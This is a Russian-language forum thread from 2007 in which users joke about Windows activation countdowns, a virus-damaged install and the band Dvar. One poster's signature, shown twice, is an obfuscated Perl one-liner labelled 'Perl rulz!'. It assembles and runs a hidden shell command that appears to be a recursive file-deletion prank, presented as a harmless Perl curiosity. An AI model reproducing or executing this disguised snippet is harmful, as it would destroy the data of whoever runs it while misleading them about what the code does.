Добавлено: Вс Сен 16, 2007 8:13 pm Заголовок сообщения:
у меня тоже было)) тебе там говорит что активировать надо да?))) и дни обратный отсчет?)))
вот будь готов к тому что пройдет 30 дней и ты не запустишь комп пока винт не форматнешь, готовься _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Сен 16, 2007 8:22 pm Заголовок сообщения:
ALuserX
У меня уже два месяца такая хрень илб три.
ALuserX писал(а):
тебе там говорит что активировать надо да?)))
ДА или купить лиценз.
ALuserX писал(а):
и дни обратный отсчет?)))
нет,может быть я вовремя отключил это обновл.Да у меня ваще
всё началось с предидущего вндуса.там чё-то вирус скушал,я вируса скушал и какя-то программа ваще сдохла.Ну кароче пипец.
И самое угарное то что тема про группу двар
Добавлено: Вс Сен 16, 2007 8:30 pm Заголовок сообщения:
genj писал(а):
тема про группу двар
самое то!
когда слушаешь двар, потом происходят разные необьяснимые явления
умирают люди
умирает винда _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Сен 16, 2007 9:54 pm Заголовок сообщения:
genj
Да?А теперь посмотри на это:
Не знаю что там ещё было,но может это и к лучшему.Вот такие у нас объявления! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 10:04 pm Заголовок сообщения:
А ещё у нас весёленькие грузовички ездят!Так,стоп!Это надо постить было в "тупость атакует"!Ну да ладно.
_________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.